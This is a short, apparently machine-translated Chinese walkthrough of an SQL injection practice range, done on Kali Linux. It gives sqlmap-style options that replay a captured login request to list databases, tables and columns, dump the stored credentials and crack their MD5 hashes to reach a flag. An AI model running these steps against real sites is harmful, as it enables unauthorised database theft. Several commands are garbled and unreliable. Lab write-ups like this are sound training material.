测试环境为Kali Linux
1.因为我打开了“SQL注入漏洞测试(POST)”射击场,所以我首先点击进去,看到了一个登录界面。 然后仔细一探,发现主要问题出在登录上,于是我使用了
2、因为这个靶场的主要目的是后期测试,所以直接进入正题,打开它,开始后期抓包,将所有内容复制到kali机器的.txt文件中。 值得注意的是,这些内容不宜保存太久,否则会失效。 ,然后失败后重试。
3、在kali终端,使用攻击:先找到数据库“-r post.txt(这个文本文件就是刚才抓包的内容) --level 5 --risk 3 --dbs --dbms mysql - 批”
4、找到数据库中的表“-r post.txt --level 5 --risk 3 -D数据库名称--batch”
5、查找数据库表中的字段“-r post.txt --level 5 --risk 3 -D数据库名-T数据表名----dbms mysql --batch”
6、找到字段内容》-r post.txt --level 5 --risk 3 -D 数据库名-T 数据表名-C(字段1,字段2,....) --dump --dbms mysql - -批”
找到登录名和密码后,我们可以看到这是一个加密的密码,所以我们需要使用解密工具——MD5。 推荐使用该网页。
7. 分别解锁两个密码。 只能使用其中之一。 登录后,您将找到Key。 最后返回提交页面,提交Key。 这样就完成了射击场的测试。